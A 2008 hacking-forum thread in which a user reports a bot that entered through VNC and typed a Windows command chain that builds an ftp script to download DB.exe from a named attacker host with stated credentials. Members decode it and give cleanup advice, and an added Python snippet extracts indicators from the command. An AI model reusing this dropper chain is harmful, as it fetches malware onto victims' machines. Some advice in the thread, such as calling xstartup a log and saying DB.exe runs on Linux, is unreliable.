Wednesday, April 23, 2014
HellBound Hackers | Computer General | Hacking in general

A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 23-01-08 22:04
Basically, at the time I was looking up something on Google. The previous days my friend had been helping me do some stuff in Ubuntu Linux by connecting remotely, so anyhow, I was looking something up in Google when suddenly I got a prompt for someone to access my PC remotely. I immediately assumed it was my friend and allowed it, and didn't note the IP address. I'm on Linux, so the attempt failed in 2 ways. Here's what I saw when I allowed it; this was typed into the Google search box. What you see could be fragments because I clicked out of the search box a few times.

:evil:h4x0r:evil:n00b:evil:Attempt:evil:below:evil:lol:evil:0wned:evil:

"systemroot%\system32\cmd.exe &echo binary > > &echo get D B.exe >>&echo bye >> &ftp -n -v -s &del & DB.exe &exit"

:evil::evil::evil::evil:evil h4x0r attempt failed:evil::evil::evil::evil:

That is what I can recover. The whole time I figured it was my friend logging in and screwing around, but he says he didn't do it. I had him connect and look for VNC logs of previous allowed connections; he couldn't find any. Does anyone know what happened, and where the logs are?

Edited by on 23-01-08 22:05
RE: A Bot/Human tried connecting to my vncserver.

fuser
Member
Posts: 960
Location: in front of a computer (duh)
Joined: 05.04.07
Rank: Mad User
Posted on 24-01-08 04:05
Well, here are the directories for the logs, and you can usually view them with a text editor like gedit.

=> /var/log/messages : General log messages

=> /var/log/boot : System boot log

=> /var/log/debug : Debugging log messages

=> /var/log/auth.log : User login and authentication logs

=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file

=> /var/log/dmesg : Linux kernel ring buffer log

=> /var/log/dpkg.log : All binary package log includes package installation and other information

=> /var/log/faillog : User failed login log file

=> /var/log/kern.log : Kernel log file

=> /var/log/lpr.log : Printer log file

=> /var/log/mail.* : All mail server message log files

=> /var/log/mysql.* : MySQL server log file

=> /var/log/user.log : All userlevel logs

=> /var/log/xorg.0.log : X.org log file

=> /var/log/apache2/* : Apache web server log files directory

=> /var/log/lighttpd/* : Lighttpd web server log files directory

=> /var/log/fsck/* : fsck command log

=> /var/log/apport.log : Application crash report / log file

I think this is the log for VNC:
/home/user/.vnc/xstartup


RE: Happened again got the IP lol

Member
Joined: 01.01.70
Rank: Guest
Posted on 24-01-08 07:59
I waited for it to; it's 3 am, which makes it an unusual time to be on the computer, but I was busy tonight so..

Here's what I got so far, which is missing maybe half a second of text because I screenshotted the IP address:

cmd /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s

Specifics:
"B0t _A159753b"
"xbytez.com"
"open ftpd"

It's a bot, with a hostname of "wsip-70-168-158-181.oc.oc.cox.net"
IP Address: 70.168.158.181
RE: A Bot/Human tried connecting to my vncserver.

korg
Admin from hell
Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank: God
Posted on 24-01-08 10:36
If you understood what it says, it's trying to create a file called "ik" with instructions which it will then pass to the command "ftp" to:

Ftp> open ftpd.xbytez.com.zr 21
ftp> user B0t _A159753b
ftp> binary
ftp> get DB.exe

I suggest you dump VNC. Check your ports to see what's open and scan your computer with a good A/V program (in safe mode). Look for DB.exe.

I thought this was patched in VNC; what version do you have? Anyway, you got jacked.
Do not leave remote access on all the time, and better yet, know who is connecting.



I deal in pain, All life I drain, I dominate, I seal your fate.
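
The reconstruction korg describes above, as an added Python example that is not code from the thread or its posters: it rebuilds what the captured command line echoes into "ik", extracts the indicators a defender would block or report, and flags the echo-then-ftp pattern even though the capture stops after "-s". The function names are hypothetical; the input is the line exactly as posted earlier in the thread.

```python
import re

# Keystrokes captured in the thread, copied as posted (the capture ends after "-s").
CAPTURED = (
    "cmd /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik "
    "&echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s"
)

ECHO_APPEND = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.IGNORECASE)

def rebuild_scripts(cmdline):
    """Split a cmd.exe '&' chain; return ({file: lines echoed into it}, other steps)."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.IGNORECASE)
    scripts, other_steps = {}, []
    for step in (s.strip() for s in body.split("&")):
        if not step:
            continue
        m = ECHO_APPEND.match(step)
        if m:
            scripts.setdefault(m.group(2), []).append(m.group(1))
        else:
            other_steps.append(step)
    return scripts, other_steps

def ftp_indicators(script_lines):
    """Pull host, port, login and fetched files out of rebuilt ftp script lines."""
    ioc = {"host": None, "port": None, "user": None, "password": None, "files": []}
    for line in script_lines:
        words = line.split()
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) > 1:
            ioc["host"] = words[1]
            ioc["port"] = int(words[2]) if len(words) > 2 and words[2].isdigit() else 21
        elif verb == "user" and len(words) > 1:
            # ftp's "user" command takes the name, then an optional password
            ioc["user"], ioc["password"] = words[1], (words[2] if len(words) > 2 else None)
        elif verb in ("get", "recv") and len(words) > 1:
            ioc["files"].append(words[1])
    return ioc

def looks_like_ftp_dropper(cmdline):
    """True when a chain echo-builds a script that fetches a file and then runs ftp -s."""
    scripts, other_steps = rebuild_scripts(cmdline)
    fetches = any(ftp_indicators(lines)["files"] for lines in scripts.values())
    runs_ftp = any(re.match(r"ftp(\.exe)?\b.*\s-s", s, re.IGNORECASE) for s in other_steps)
    return fetches and runs_ftp
```

The same check can be run over shell history or any keystroke or command-line capture, one line at a time.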
RE: A Bot/Human tried connecting to my vncserver.

hellboundhackersok
Member
Posts: 353
Joined: 20.09.07
Rank: Moderate
Warn Level: 95
Posted on 24-01-08 16:08
Lol, that bot tried attacking a Windows computer.. and you were on Linux.. so you have nothing to worry about...

linux pwns


RE: A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 24-01-08 17:23
I connected to the FTP server and logged in with the details the bot was going to use. I found a few .exes, which I plan to run in a VM later Grin

and a text file called GET 0UT.txt
Here's the content:

GET 0ut holmes

hahaha

0wned?

just a friendly msg to av companys: FUCK U
RE: A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 24-01-08 17:28
http://isc.sans.org/diary.html?storyid=3630

Go there, apparently it's a bot that is easily attainable. Some kid got hacked while playing a pc game. Could help with your problem.


RE: A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 24-01-08 17:54
hellboundhackersok wrote:
Lol, that bot tried attacking a Windows computer.. and you were on Linux.. so you have nothing to worry about...

linux pwns


Exactly! Smile So korg, it wouldn't affect me, considering the bot typed it all in Google. I tried logging into the FTP; I couldn't get in. What's the user/pass?
Isn't the username something like B0T_A157#something#something#something?
I think it's a problem with VNC. I'll just update VNC and see what that does.

Edited by on 24-01-08 17:55
RE: A Bot/Human tried connecting to my vncserver.

korg
Admin from hell
Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank: God
Posted on 24-01-08 18:42
Wrong. Read the last line of the code: FTP -n -v -s. So you can't use ftp on Linux, eehh:

http://linux.abou. . .l1_ftp.htm

Works both ways.


RE: A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 24-01-08 18:49
However, DB.exe would not be able to run unless you used Wine.
RE: A Bot/Human tried connecting to my vncserver.

korg
Admin from hell
Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank: God
Posted on 24-01-08 19:06
Again, in the ftp command it says "get", not install, DB.exe, and you have no idea what code is in that .exe file. Yes, it does run on Linux;
look more into it yourself to find out. On Linux I believe it was just DB or IKDB or just IK as the backdoor. Check your computer for those files.






Edited by korg on 24-01-08 19:27
RE: A Bot/Human tried connecting to my vncserver.

Member
Joined: 01.01.70
Rank: Guest
Posted on 25-01-08 04:19
Oh, I see.

Edited by on 25-01-08 06:16